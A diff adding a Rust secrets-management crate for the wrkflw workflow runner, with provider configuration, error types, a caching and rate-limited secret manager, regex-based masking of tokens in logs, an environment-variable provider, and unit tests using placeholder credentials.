        // Add default environment variable provider
        providers.insert(
            "env".to_string(),
            SecretProviderConfig::Environment { prefix: None },
        );

        // Add default file provider
        providers.insert(
            "file".to_string(),
            SecretProviderConfig::File {
                path: "~/.wrkflw/secrets".to_string(),
            },
        );

        Self {
            default_provider: "env".to_string(),
            providers,
            enable_masking: true,
            timeout_seconds: 30,
            enable_caching: true,
            cache_ttl_seconds: 300, // 5 minutes
            rate_limit: RateLimitConfig::default(),
        }
    }
}

/// Configuration for different types of secret providers
#[derive(Debug, Clone, Serialize, Deserialize)]
#[serde(tag = "type", rename_all = "snake_case")]
pub enum SecretProviderConfig {
    /// Environment variables provider
    Environment {
        /// Optional prefix for environment variables (e.g., "WRKFLW_SECRET_")
        prefix: Option<String>,
    },

    /// File-based secret storage
    File {
        /// Path to the secrets file or directory
        path: String,
    },
    // Cloud providers are planned for future implementation
    // /// HashiCorp Vault provider
    // #[cfg(feature = "vault-provider")]
    // Vault {
    //     /// Vault server URL
    //     url: String,
    //     /// Authentication method
    //     auth: VaultAuth,
    //     /// Optional mount path (defaults to "secret")
    //     mount_path: Option<String>,
    // },

    // /// AWS Secrets Manager provider
    // #[cfg(feature = "aws-provider")]
    // AwsSecretsManager {
    //     /// AWS region
    //     region: String,
    //     /// Optional role ARN to assume
    //     role_arn: Option<String>,
    // },

    // /// Azure Key Vault provider
    // #[cfg(feature = "azure-provider")]
    // AzureKeyVault {
    //     /// Key Vault URL
    //     vault_url: String,
    //     /// Authentication method
    //     auth: AzureAuth,
    // },

    // /// Google Cloud Secret Manager provider
    // #[cfg(feature = "gcp-provider")]
    // GcpSecretManager {
    //     /// GCP project ID
    //     project_id: String,
    //     /// Optional service account key file path
    //     key_file: Option<String>,
    // },
}

// Cloud provider authentication types are planned for future implementation
// /// HashiCorp Vault authentication methods
// #[cfg(feature = "vault-provider")]
// #[derive(Debug, Clone, Serialize, Deserialize)]
// #[serde(tag = "method", rename_all = "snake_case")]
// pub enum VaultAuth {
//     /// Token-based authentication
//     Token { token: String },
//     /// AppRole authentication
//     AppRole { role_id: String, secret_id: String },
//     /// Kubernetes authentication
//     Kubernetes {
//         role: String,
//         jwt_path: Option<String>,
//     },
// }

// /// Azure authentication methods
// #[cfg(feature = "azure-provider")]
// #[derive(Debug, Clone, Serialize, Deserialize)]
// #[serde(tag = "method", rename_all = "snake_case")]
// pub enum AzureAuth {
//     /// Service Principal authentication
//     ServicePrincipal {
//         client_id: String,
//         client_secret: String,
//         tenant_id: String,
//     },
//     /// Managed Identity authentication
//     ManagedIdentity,
//     /// Azure CLI authentication
//     AzureCli,
// }

impl SecretConfig {
    /// Load configuration from a file
    pub fn from_file(path: &str) -> crate::SecretResult<Self> {
        let content = std::fs::read_to_string(path)?;

        if path.ends_with(".json") {
            Ok(serde_json::from_str(&content)?)
        } else if path.ends_with(".yml") || path.ends_with(".yaml") {
            Ok(serde_yaml::from_str(&content)?)
        } else {
            Err(crate::SecretError::invalid_config(
                "Unsupported config file format. Use .json, .yml, or .yaml",
            ))
        }
    }

    /// Save configuration to a file
    pub fn to_file(&self, path: &str) -> crate::SecretResult<()> {
        let content = if path.ends_with(".json") {
            serde_json::to_string_pretty(self)?
        } else if path.ends_with(".yml") || path.ends_with(".yaml") {
            serde_yaml::to_string(self)?
        } else {
            return Err(crate::SecretError::invalid_config(
                "Unsupported config file format. Use .json, .yml, or .yaml",
            ));
        };

        std::fs::write(path, content)?;
        Ok(())
    }

    /// Load configuration from environment variables
    pub fn from_env() -> Self {
        let mut config = Self::default();

        // Override default provider if specified
        if let Ok(provider) = std::env::var("WRKFLW_DEFAULT_SECRET_PROVIDER") {
            config.default_provider = provider;
        }

        // Override masking setting
        if let Ok(masking) = std::env::var("WRKFLW_SECRET_MASKING") {
            config.enable_masking = masking.parse().unwrap_or(true);
        }

        // Override timeout
        if let Ok(timeout) = std::env::var("WRKFLW_SECRET_TIMEOUT") {
            config.timeout_seconds = timeout.parse().unwrap_or(30);
        }

        config
    }
}
88 crates/secrets/src/error.rs Normal file
@@ -0,0 +1,88 @@
use thiserror::Error;

/// Result type for secret operations
pub type SecretResult<T> = Result<T, SecretError>;

/// Errors that can occur during secret operations
#[derive(Error, Debug)]
pub enum SecretError {
    #[error("Secret not found: {name}")]
    NotFound { name: String },

    #[error("Secret provider '{provider}' not found")]
    ProviderNotFound { provider: String },

    #[error("Authentication failed for provider '{provider}': {reason}")]
    AuthenticationFailed { provider: String, reason: String },

    #[error("Network error accessing secret provider: {0}")]
    NetworkError(String),

    #[error("Invalid secret configuration: {0}")]
    InvalidConfig(String),

    #[error("Encryption error: {0}")]
    EncryptionError(String),

    #[error("IO error: {0}")]
    IoError(#[from] std::io::Error),

    #[error("JSON parsing error: {0}")]
    JsonError(#[from] serde_json::Error),

    #[error("YAML parsing error: {0}")]
    YamlError(#[from] serde_yaml::Error),

    #[error("Invalid secret value format: {0}")]
    InvalidFormat(String),

    #[error("Secret operation timeout")]
    Timeout,

    #[error("Permission denied accessing secret: {name}")]
    PermissionDenied { name: String },

    #[error("Internal error: {0}")]
    Internal(String),

    #[error("Invalid secret name: {reason}")]
    InvalidSecretName { reason: String },

    #[error("Secret value too large: {size} bytes (max: {max_size} bytes)")]
    SecretTooLarge { size: usize, max_size: usize },

    #[error("Rate limit exceeded: {0}")]
    RateLimitExceeded(String),
}

impl SecretError {
    /// Create a new NotFound error
    pub fn not_found(name: impl Into<String>) -> Self {
        Self::NotFound { name: name.into() }
    }

    /// Create a new ProviderNotFound error
    pub fn provider_not_found(provider: impl Into<String>) -> Self {
        Self::ProviderNotFound {
            provider: provider.into(),
        }
    }

    /// Create a new AuthenticationFailed error
    pub fn auth_failed(provider: impl Into<String>, reason: impl Into<String>) -> Self {
        Self::AuthenticationFailed {
            provider: provider.into(),
            reason: reason.into(),
        }
    }

    /// Create a new InvalidConfig error
    pub fn invalid_config(msg: impl Into<String>) -> Self {
        Self::InvalidConfig(msg.into())
    }

    /// Create a new Internal error
    pub fn internal(msg: impl Into<String>) -> Self {
        Self::Internal(msg.into())
    }
}
247 crates/secrets/src/lib.rs Normal file
@@ -0,0 +1,247 @@
// Copyright 2024 wrkflw contributors
// SPDX-License-Identifier: MIT

//! # wrkflw-secrets
//!
//! Comprehensive secrets management for wrkflw workflow execution.
//! Supports multiple secret providers and secure handling throughout the execution pipeline.
//!
//! ## Features
//!
//! - **Multiple Secret Providers**: Environment variables, file-based storage, with extensibility for cloud providers
//! - **Secret Substitution**: GitHub Actions-style secret references (`${{ secrets.SECRET_NAME }}`)
//! - **Automatic Masking**: Intelligent secret detection and masking in logs and output
//! - **Rate Limiting**: Built-in protection against secret access abuse
//! - **Caching**: Configurable caching for improved performance
//! - **Input Validation**: Comprehensive validation of secret names and values
//! - **Thread Safety**: Full async/await support with thread-safe operations
//!
//! ## Quick Start
//!
//! ```rust
//! use wrkflw_secrets::{SecretManager, SecretMasker, SecretSubstitution};
//!
//! #[tokio::main]
//! async fn main() -> Result<(), Box<dyn std::error::Error>> {
//!     // Initialize the secret manager with default configuration
//!     let manager = SecretManager::default().await?;
//!
//!     // Set an environment variable for testing
//!     std::env::set_var("API_TOKEN", "secret_api_token_123");
//!
//!     // Retrieve a secret
//!     let secret = manager.get_secret("API_TOKEN").await?;
//!     println!("Secret value: {}", secret.value());
//!
//!     // Use secret substitution
//!     let mut substitution = SecretSubstitution::new(&manager);
//!     let template = "Using token: ${{ secrets.API_TOKEN }}";
//!     let resolved = substitution.substitute(template).await?;
//!     println!("Resolved: {}", resolved);
//!
//!     // Set up secret masking
//!     let mut masker = SecretMasker::new();
//!     masker.add_secret("secret_api_token_123");
//!
//!     let log_message = "Failed to authenticate with token: secret_api_token_123";
//!     let masked = masker.mask(log_message);
//!     println!("Masked: {}", masked); // Will show: "Failed to authenticate with token: se****************23"
//!
//!     // Clean up
//!     std::env::remove_var("API_TOKEN");
//!     Ok(())
//! }
//! ```
//!
//! ## Configuration
//!
//! ```rust
//! use wrkflw_secrets::{SecretConfig, SecretProviderConfig, SecretManager};
//! use std::collections::HashMap;
//!
//! #[tokio::main]
//! async fn main() -> Result<(), Box<dyn std::error::Error>> {
//!     let mut providers = HashMap::new();
//!
//!     // Environment variable provider with prefix
//!     providers.insert(
//!         "env".to_string(),
//!         SecretProviderConfig::Environment {
//!             prefix: Some("MYAPP_SECRET_".to_string())
//!         }
//!     );
//!
//!     // File-based provider
//!     providers.insert(
//!         "file".to_string(),
//!         SecretProviderConfig::File {
//!             path: "/path/to/secrets.json".to_string()
//!         }
//!     );
//!
//!     let config = SecretConfig {
//!         default_provider: "env".to_string(),
//!         providers,
//!         enable_masking: true,
//!         timeout_seconds: 30,
//!         enable_caching: true,
//!         cache_ttl_seconds: 300,
//!         rate_limit: Default::default(),
//!     };
//!
//!     let manager = SecretManager::new(config).await?;
//!     Ok(())
//! }
//! ```
//!
//! ## Security Features
//!
//! ### Input Validation
//!
//! All secret names and values are validated to prevent injection attacks and ensure compliance
//! with naming conventions.
//!
//! ### Rate Limiting
//!
//! Built-in rate limiting prevents abuse and denial-of-service attacks on secret providers.
//!
//! ### Automatic Pattern Detection
//!
//! The masking system automatically detects and masks common secret patterns:
//! - GitHub Personal Access Tokens (`ghp_*`)
//! - AWS Access Keys (`AKIA*`)
//! - JWT tokens
//! - API keys and tokens
//!
//! ### Memory Safety
//!
//! Secrets are handled with care to minimize exposure in memory and logs.
//!
//! ## Provider Support
//!
//! ### Environment Variables
//!
//! ```rust
//! use wrkflw_secrets::{SecretProviderConfig, SecretManager, SecretConfig};
//!
//! // With prefix for better security
//! let provider = SecretProviderConfig::Environment {
//!     prefix: Some("MYAPP_".to_string())
//! };
//! ```
//!
//! ### File-based Storage
//!
//! Supports JSON, YAML, and environment file formats:
//!
//! ```json
//! {
//!   "database_password": "super_secret_password",
//!   "api_key": "your_api_key_here"
//! }
//! ```
//!
//! ```yaml
//! database_password: super_secret_password
//! api_key: your_api_key_here
//! ```
//!
//! ```bash
//! # Environment format
//! DATABASE_PASSWORD=super_secret_password
//! API_KEY="your_api_key_here"
//! ```

pub mod config;
pub mod error;
pub mod manager;
pub mod masking;
pub mod providers;
pub mod rate_limit;
pub mod storage;
pub mod substitution;
pub mod validation;

pub use config::{SecretConfig, SecretProviderConfig};
pub use error::{SecretError, SecretResult};
pub use manager::SecretManager;
pub use masking::SecretMasker;
pub use providers::{SecretProvider, SecretValue};
pub use substitution::SecretSubstitution;

/// Re-export commonly used types
pub mod prelude {
    pub use crate::{
        SecretConfig, SecretError, SecretManager, SecretMasker, SecretProvider, SecretResult,
        SecretSubstitution, SecretValue,
    };
}

#[cfg(test)]
mod tests {
    use super::*;
    use uuid;

    #[tokio::test]
    async fn test_basic_secret_management() {
        let config = SecretConfig::default();
        let manager = SecretManager::new(config)
            .await
            .expect("Failed to create manager");

        // Use a unique test secret name to avoid conflicts
        let test_secret_name = format!(
            "TEST_SECRET_{}",
            uuid::Uuid::new_v4().to_string().replace('-', "_")
        );
        std::env::set_var(&test_secret_name, "secret_value");

        let result = manager.get_secret(&test_secret_name).await;
        assert!(result.is_ok());

        let secret = result.unwrap();
        assert_eq!(secret.value(), "secret_value");

        std::env::remove_var(&test_secret_name);
    }

    #[tokio::test]
    async fn test_secret_substitution() {
        let config = SecretConfig::default();
        let manager = SecretManager::new(config)
            .await
            .expect("Failed to create manager");

        // Use a unique test secret name to avoid conflicts
        let test_secret_name = format!(
            "GITHUB_TOKEN_{}",
            uuid::Uuid::new_v4().to_string().replace('-', "_")
        );
        std::env::set_var(&test_secret_name, "ghp_test_token");

        let mut substitution = SecretSubstitution::new(&manager);
        let input = format!("echo 'Token: ${{{{ secrets.{} }}}}'", test_secret_name);

        let result = substitution.substitute(&input).await;
        assert!(result.is_ok());

        let output = result.unwrap();
        assert!(output.contains("ghp_test_token"));

        std::env::remove_var(&test_secret_name);
    }

    #[tokio::test]
    async fn test_secret_masking() {
        let mut masker = SecretMasker::new();
        masker.add_secret("secret123");
        masker.add_secret("password456");

        let input = "The secret is secret123 and password is password456";
        let masked = masker.mask(input);

        assert!(masked.contains("***"));
        assert!(!masked.contains("secret123"));
        assert!(!masked.contains("password456"));
    }
}
267 crates/secrets/src/manager.rs Normal file
@@ -0,0 +1,267 @@
use crate::{
    config::{SecretConfig, SecretProviderConfig},
    providers::{env::EnvironmentProvider, file::FileProvider, SecretProvider, SecretValue},
    rate_limit::RateLimiter,
    validation::{validate_provider_name, validate_secret_name},
    SecretError, SecretResult,
};
use std::collections::HashMap;
use std::sync::Arc;
use tokio::sync::RwLock;

/// Cached secret entry
#[derive(Debug, Clone)]
struct CachedSecret {
    value: SecretValue,
    expires_at: chrono::DateTime<chrono::Utc>,
}

/// Central secret manager that coordinates multiple providers
pub struct SecretManager {
    config: SecretConfig,
    providers: HashMap<String, Box<dyn SecretProvider>>,
    cache: Arc<RwLock<HashMap<String, CachedSecret>>>,
    rate_limiter: RateLimiter,
}

impl SecretManager {
    /// Create a new secret manager with the given configuration
    pub async fn new(config: SecretConfig) -> SecretResult<Self> {
        let mut providers: HashMap<String, Box<dyn SecretProvider>> = HashMap::new();

        // Initialize providers based on configuration
        for (name, provider_config) in &config.providers {
            // Validate provider name
            validate_provider_name(name)?;

            let provider: Box<dyn SecretProvider> = match provider_config {
                SecretProviderConfig::Environment { prefix } => {
                    Box::new(EnvironmentProvider::new(prefix.clone()))
                }
                SecretProviderConfig::File { path } => Box::new(FileProvider::new(path.clone())),
                // Cloud providers are planned for future implementation
                // #[cfg(feature = "vault-provider")]
                // SecretProviderConfig::Vault { url, auth, mount_path } => {
                //     Box::new(crate::providers::vault::VaultProvider::new(
                //         url.clone(),
                //         auth.clone(),
                //         mount_path.clone(),
                //     ).await?)
                // }
            };

            providers.insert(name.clone(), provider);
        }

        let rate_limiter = RateLimiter::new(config.rate_limit.clone());

        Ok(Self {
            config,
            providers,
            cache: Arc::new(RwLock::new(HashMap::new())),
            rate_limiter,
        })
    }

    /// Create a new secret manager with default configuration
    pub async fn default() -> SecretResult<Self> {
        Self::new(SecretConfig::default()).await
    }

    /// Get a secret by name using the default provider
    pub async fn get_secret(&self, name: &str) -> SecretResult<SecretValue> {
        validate_secret_name(name)?;
        self.get_secret_from_provider(&self.config.default_provider, name)
            .await
    }

    /// Get a secret from a specific provider
    pub async fn get_secret_from_provider(
        &self,
        provider_name: &str,
        name: &str,
    ) -> SecretResult<SecretValue> {
        validate_provider_name(provider_name)?;
        validate_secret_name(name)?;

        // Check rate limit
        let rate_limit_key = format!("{}:{}", provider_name, name);
        self.rate_limiter.check_rate_limit(&rate_limit_key).await?;

        // Check cache first if caching is enabled
        if self.config.enable_caching {
            let cache_key = format!("{}:{}", provider_name, name);

            {
                let cache = self.cache.read().await;
                if let Some(cached) = cache.get(&cache_key) {
                    if chrono::Utc::now() < cached.expires_at {
                        return Ok(cached.value.clone());
                    }
                }
            }
        }

        // Get provider
        let provider = self
            .providers
            .get(provider_name)
            .ok_or_else(|| SecretError::provider_not_found(provider_name))?;

        // Get secret from provider
        let secret = provider.get_secret(name).await?;

        // Cache the result if caching is enabled
        if self.config.enable_caching {
            let cache_key = format!("{}:{}", provider_name, name);
            let expires_at = chrono::Utc::now()
                + chrono::Duration::seconds(self.config.cache_ttl_seconds as i64);

            let cached_secret = CachedSecret {
                value: secret.clone(),
                expires_at,
            };

            let mut cache = self.cache.write().await;
            cache.insert(cache_key, cached_secret);
        }

        Ok(secret)
    }

    /// List all available secrets from all providers
    pub async fn list_all_secrets(&self) -> SecretResult<HashMap<String, Vec<String>>> {
        let mut all_secrets = HashMap::new();

        for (provider_name, provider) in &self.providers {
            match provider.list_secrets().await {
                Ok(secrets) => {
                    all_secrets.insert(provider_name.clone(), secrets);
                }
                Err(_) => {
                    // Some providers may not support listing, ignore errors
                    all_secrets.insert(provider_name.clone(), vec![]);
                }
            }
        }

        Ok(all_secrets)
    }

    /// Check health of all providers
    pub async fn health_check(&self) -> HashMap<String, SecretResult<()>> {
        let mut results = HashMap::new();

        for (provider_name, provider) in &self.providers {
            let result = provider.health_check().await;
            results.insert(provider_name.clone(), result);
        }

        results
    }

    /// Clear the cache
    pub async fn clear_cache(&self) {
        let mut cache = self.cache.write().await;
        cache.clear();
    }

    /// Get configuration
    pub fn config(&self) -> &SecretConfig {
        &self.config
    }

    /// Check if a provider exists
    pub fn has_provider(&self, name: &str) -> bool {
        self.providers.contains_key(name)
    }

    /// Get provider names
    pub fn provider_names(&self) -> Vec<String> {
        self.providers.keys().cloned().collect()
    }
}

#[cfg(test)]
mod tests {
    use super::*;

    #[tokio::test]
    async fn test_secret_manager_creation() {
        let config = SecretConfig::default();
        let manager = SecretManager::new(config).await;
        assert!(manager.is_ok());

        let manager = manager.unwrap();
        assert!(manager.has_provider("env"));
        assert!(manager.has_provider("file"));
    }

    #[tokio::test]
    async fn test_secret_manager_environment_provider() {
        // Use unique secret name to avoid test conflicts
        let test_secret_name = format!("TEST_SECRET_MANAGER_{}", std::process::id());
        std::env::set_var(&test_secret_name, "manager_test_value");

        let manager = SecretManager::default().await.unwrap();
        let result = manager
            .get_secret_from_provider("env", &test_secret_name)
            .await;

        assert!(result.is_ok());
        let secret = result.unwrap();
        assert_eq!(secret.value(), "manager_test_value");

        std::env::remove_var(&test_secret_name);
    }

    #[tokio::test]
    async fn test_secret_manager_caching() {
        // Use unique secret name to avoid test conflicts
        let test_secret_name = format!("CACHE_TEST_SECRET_{}", std::process::id());
        std::env::set_var(&test_secret_name, "cached_value");

        let config = SecretConfig {
            enable_caching: true,
            cache_ttl_seconds: 60, // 1 minute
            ..Default::default()
        };

        let manager = SecretManager::new(config).await.unwrap();

        // First call should hit the provider
        let result1 = manager
            .get_secret_from_provider("env", &test_secret_name)
            .await;
        assert!(result1.is_ok());

        // Remove the environment variable
        std::env::remove_var(&test_secret_name);

        // Second call should hit the cache and still return the value
        let result2 = manager
            .get_secret_from_provider("env", &test_secret_name)
            .await;
        assert!(result2.is_ok());
        assert_eq!(result2.unwrap().value(), "cached_value");

        // Clear cache and try again - should fail now
        manager.clear_cache().await;
        let result3 = manager
            .get_secret_from_provider("env", &test_secret_name)
            .await;
        assert!(result3.is_err());
    }

    #[tokio::test]
    async fn test_secret_manager_health_check() {
        let manager = SecretManager::default().await.unwrap();
        let health_results = manager.health_check().await;

        assert!(health_results.contains_key("env"));
        assert!(health_results.contains_key("file"));

        // Environment provider should be healthy
        assert!(health_results.get("env").unwrap().is_ok());
    }
}
348 crates/secrets/src/masking.rs Normal file
@@ -0,0 +1,348 @@
use regex::Regex;
use std::collections::{HashMap, HashSet};
use std::sync::OnceLock;

/// Compiled regex patterns for common secret formats
struct CompiledPatterns {
    github_pat: Regex,
    github_app: Regex,
    github_oauth: Regex,
    aws_access_key: Regex,
    aws_secret: Regex,
    jwt: Regex,
    api_key: Regex,
}

impl CompiledPatterns {
    fn new() -> Self {
        Self {
            github_pat: Regex::new(r"ghp_[a-zA-Z0-9]{36}").unwrap(),
            github_app: Regex::new(r"ghs_[a-zA-Z0-9]{36}").unwrap(),
            github_oauth: Regex::new(r"gho_[a-zA-Z0-9]{36}").unwrap(),
            aws_access_key: Regex::new(r"AKIA[0-9A-Z]{16}").unwrap(),
            aws_secret: Regex::new(r"[A-Za-z0-9/+=]{40}").unwrap(),
            jwt: Regex::new(r"eyJ[a-zA-Z0-9_-]*\.eyJ[a-zA-Z0-9_-]*\.[a-zA-Z0-9_-]*").unwrap(),
            api_key: Regex::new(r"(?i)(api[_-]?key|token)[\s:=]+[a-zA-Z0-9_-]{16,}").unwrap(),
        }
    }
}

/// Global compiled patterns (initialized once)
static PATTERNS: OnceLock<CompiledPatterns> = OnceLock::new();

/// Secret masking utility to prevent secrets from appearing in logs
pub struct SecretMasker {
    secrets: HashSet<String>,
    secret_cache: HashMap<String, String>, // Cache masked versions
    mask_char: char,
    min_length: usize,
}

impl SecretMasker {
    /// Create a new secret masker
    pub fn new() -> Self {
        Self {
            secrets: HashSet::new(),
            secret_cache: HashMap::new(),
            mask_char: '*',
            min_length: 3, // Don't mask very short strings
        }
    }

    /// Create a new secret masker with custom mask character
    pub fn with_mask_char(mask_char: char) -> Self {
        Self {
            secrets: HashSet::new(),
            secret_cache: HashMap::new(),
            mask_char,
            min_length: 3,
        }
    }

    /// Add a secret to be masked
    pub fn add_secret(&mut self, secret: impl Into<String>) {
        let secret = secret.into();
        if secret.len() >= self.min_length {
            let masked = self.create_mask(&secret);
            self.secret_cache.insert(secret.clone(), masked);
            self.secrets.insert(secret);
        }
    }

    /// Add multiple secrets to be masked
    pub fn add_secrets(&mut self, secrets: impl IntoIterator<Item = String>) {
        for secret in secrets {
            self.add_secret(secret);
        }
    }

    /// Remove a secret from masking
    pub fn remove_secret(&mut self, secret: &str) {
        self.secrets.remove(secret);
        self.secret_cache.remove(secret);
    }

    /// Clear all secrets
    pub fn clear(&mut self) {
        self.secrets.clear();
        self.secret_cache.clear();
    }

    /// Mask secrets in the given text
    pub fn mask(&self, text: &str) -> String {
        let mut result = text.to_string();

        // Use cached masked versions for better performance
        for secret in &self.secrets {
            if !secret.is_empty() {
                if let Some(masked) = self.secret_cache.get(secret) {
                    result = result.replace(secret, masked);
                }
            }
        }

        // Also mask potential tokens and keys with regex patterns
        result = self.mask_patterns(&result);

        result
    }

    /// Create a mask for a secret, preserving some structure for debugging
    fn create_mask(&self, secret: &str) -> String {
        let len = secret.len();

        if len <= 3 {
            // Very short secrets - mask completely
            self.mask_char.to_string().repeat(3)
        } else if len <= 8 {
            // Short secrets - show first character
            format!(
                "{}{}",
                secret.chars().next().unwrap(),
                self.mask_char.to_string().repeat(len - 1)
            )
        } else {
            // Longer secrets - show first 2 and last 2 characters
            let chars: Vec<char> = secret.chars().collect();
            let first_two = chars.iter().take(2).collect::<String>();
            let last_two = chars.iter().skip(len - 2).collect::<String>();
            let middle_mask = self.mask_char.to_string().repeat(len - 4);
            format!("{}{}{}", first_two, middle_mask, last_two)
        }
    }

    /// Mask common patterns that look like secrets
    fn mask_patterns(&self, text: &str) -> String {
        let patterns = PATTERNS.get_or_init(CompiledPatterns::new);
        let mut result = text.to_string();

        // GitHub Personal Access Tokens
        result = patterns
            .github_pat
            .replace_all(&result, "ghp_***")
            .to_string();

        // GitHub App tokens
        result = patterns
            .github_app
            .replace_all(&result, "ghs_***")
            .to_string();

        // GitHub OAuth tokens
        result = patterns
            .github_oauth
            .replace_all(&result, "gho_***")
            .to_string();

        // AWS Access Key IDs
        result = patterns
            .aws_access_key
            .replace_all(&result, "AKIA***")
            .to_string();

        // AWS Secret Access Keys (basic pattern)
        // Only mask if it's clearly in a secret context (basic heuristic)
        if text.to_lowercase().contains("secret") || text.to_lowercase().contains("key") {
            result = patterns.aws_secret.replace_all(&result, "***").to_string();
        }

        // JWT tokens (basic pattern)
        result = patterns
            .jwt
            .replace_all(&result, "eyJ***.eyJ***.***")
            .to_string();

        // API keys with common prefixes
        result = patterns
            .api_key
            .replace_all(&result, "${1}=***")
            .to_string();

        result
    }

    /// Check if text contains any secrets
    pub fn contains_secrets(&self, text: &str) -> bool {
        for secret in &self.secrets {
            if text.contains(secret) {
                return true;
            }
        }

        // Also check for common patterns
        self.has_secret_patterns(text)
    }

    /// Check if text contains common secret patterns
    fn has_secret_patterns(&self, text: &str) -> bool {
        let patterns = PATTERNS.get_or_init(CompiledPatterns::new);

        patterns.github_pat.is_match(text)
            || patterns.github_app.is_match(text)
            || patterns.github_oauth.is_match(text)
            || patterns.aws_access_key.is_match(text)
            || patterns.jwt.is_match(text)
    }

    /// Get the number of secrets being tracked
    pub fn secret_count(&self) -> usize {
        self.secrets.len()
    }

    /// Check if a specific secret is being tracked
    pub fn has_secret(&self, secret: &str) -> bool {
        self.secrets.contains(secret)
    }
}

impl Default for SecretMasker {
    fn default() -> Self {
        Self::new()
    }
}

#[cfg(test)]
mod tests {
    use super::*;

    #[test]
    fn test_basic_masking() {
        let mut masker = SecretMasker::new();
        masker.add_secret("secret123");
        masker.add_secret("password456");

        let input = "The secret is secret123 and password is password456";
        let masked = masker.mask(input);

        assert!(!masked.contains("secret123"));
        assert!(!masked.contains("password456"));
        assert!(masked.contains("***"));
    }

    #[test]
    fn test_preserve_structure() {
        let mut masker = SecretMasker::new();
        masker.add_secret("verylongsecretkey123");

        let input = "Key: verylongsecretkey123";
        let masked = masker.mask(input);

        // Should preserve first 2 and last 2 characters
        assert!(masked.contains("ve"));
        assert!(masked.contains("23"));
        assert!(masked.contains("***"));
        assert!(!masked.contains("verylongsecretkey123"));
    }

    #[test]
    fn test_github_token_patterns() {
        let masker = SecretMasker::new();

        let input = "Token: ghp_1234567890123456789012345678901234567890";
        let masked = masker.mask(input);

        assert!(!masked.contains("ghp_1234567890123456789012345678901234567890"));
        assert!(masked.contains("ghp_***"));
    }

    #[test]
    fn test_aws_access_key_patterns() {
        let masker = SecretMasker::new();

        let input = "AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE";
        let masked = masker.mask(input);

        assert!(!masked.contains("AKIAIOSFODNN7EXAMPLE"));
        assert!(masked.contains("AKIA***"));
    }

    #[test]
    fn test_jwt_token_patterns() {
        let masker = SecretMasker::new();

        let input = "JWT: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c";
        let masked = masker.mask(input);

        assert!(masked.contains("eyJ***.eyJ***.***"));
        assert!(!masked.contains("SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c"));
    }

    #[test]
    fn test_contains_secrets() {
        let mut masker = SecretMasker::new();
        masker.add_secret("secret123");

        assert!(masker.contains_secrets("The secret is secret123"));
        assert!(!masker.contains_secrets("No secrets here"));
        assert!(masker.contains_secrets("Token: ghp_1234567890123456789012345678901234567890"));
    }

    #[test]
    fn test_short_secrets() {
        let mut masker = SecretMasker::new();
        masker.add_secret("ab"); // Too short, should not be added
        masker.add_secret("abc"); // Minimum length

        assert_eq!(masker.secret_count(), 1);
        assert!(!masker.has_secret("ab"));
        assert!(masker.has_secret("abc"));
    }

    #[test]
    fn test_custom_mask_char() {
        let mut masker = SecretMasker::with_mask_char('X');
        masker.add_secret("secret123");

        let input = "The secret is secret123";
        let masked = masker.mask(input);

        assert!(masked.contains("XX"));
        assert!(!masked.contains("**"));
    }

    #[test]
    fn test_remove_secret() {
        let mut masker = SecretMasker::new();
        masker.add_secret("secret123");
        masker.add_secret("password456");

        assert_eq!(masker.secret_count(), 2);

        masker.remove_secret("secret123");
        assert_eq!(masker.secret_count(), 1);
        assert!(!masker.has_secret("secret123"));
        assert!(masker.has_secret("password456"));
    }

    #[test]
    fn test_clear_secrets() {
        let mut masker = SecretMasker::new();
        masker.add_secret("secret123");
        masker.add_secret("password456");

        assert_eq!(masker.secret_count(), 2);

        masker.clear();
        assert_eq!(masker.secret_count(), 0);
    }
}
143 crates/secrets/src/providers/env.rs Normal file
@@ -0,0 +1,143 @@
use crate::{
    validation::validate_secret_value, SecretError, SecretProvider, SecretResult, SecretValue,
};
use async_trait::async_trait;
use std::collections::HashMap;

/// Environment variable secret provider
pub struct EnvironmentProvider {
    prefix: Option<String>,
}

impl EnvironmentProvider {
    /// Create a new environment provider
    pub fn new(prefix: Option<String>) -> Self {
        Self { prefix }
    }
}

impl Default for EnvironmentProvider {
    fn default() -> Self {
        Self::new(None)
    }
}

impl EnvironmentProvider {
    /// Get the full environment variable name
    fn get_env_name(&self, name: &str) -> String {
        match &self.prefix {
            Some(prefix) => format!("{}{}", prefix, name),
            None => name.to_string(),
        }
    }
}

#[async_trait]
impl SecretProvider for EnvironmentProvider {
    async fn get_secret(&self, name: &str) -> SecretResult<SecretValue> {
        let env_name = self.get_env_name(name);

        match std::env::var(&env_name) {
            Ok(value) => {
                // Validate the secret value
                validate_secret_value(&value)?;

                let mut metadata = HashMap::new();
                metadata.insert("source".to_string(), "environment".to_string());
                metadata.insert("env_var".to_string(), env_name);

                Ok(SecretValue::with_metadata(value, metadata))
            }
            Err(std::env::VarError::NotPresent) => Err(SecretError::not_found(name)),
            Err(std::env::VarError::NotUnicode(_)) => Err(SecretError::InvalidFormat(format!(
                "Environment variable '{}' contains invalid Unicode",
                env_name
            ))),
        }
    }

    async fn list_secrets(&self) -> SecretResult<Vec<String>> {
        let mut secrets = Vec::new();

        for (key, _) in std::env::vars() {
            if let Some(prefix) = &self.prefix {
                if key.starts_with(prefix) {
                    secrets.push(key[prefix.len()..].to_string());
                }
            } else {
                // Without a prefix we can't distinguish secrets from regular env vars,
                // so return an error suggesting the use of a prefix.
                return Err(SecretError::internal(
                    "Cannot list secrets from environment without a prefix. Configure a prefix like 'WRKFLW_SECRET_'",
                ));
            }
        }

        Ok(secrets)
    }

    fn name(&self) -> &str {
        "environment"
    }
}

#[cfg(test)]
mod tests {
    use super::*;

    #[tokio::test]
    async fn test_environment_provider_basic() {
        let provider = EnvironmentProvider::default();

        // Use a unique secret name to avoid test conflicts
        let test_secret_name = format!("TEST_SECRET_{}", std::process::id());
        std::env::set_var(&test_secret_name, "test_value");

        let result = provider.get_secret(&test_secret_name).await;
        assert!(result.is_ok());

        let secret = result.unwrap();
        assert_eq!(secret.value(), "test_value");
        assert_eq!(
            secret.metadata.get("source"),
            Some(&"environment".to_string())
        );

        // Clean up
        std::env::remove_var(&test_secret_name);
    }

    #[tokio::test]
    async fn test_environment_provider_with_prefix() {
        let provider = EnvironmentProvider::new(Some("WRKFLW_SECRET_".to_string()));

        // Use a unique secret name to avoid test conflicts
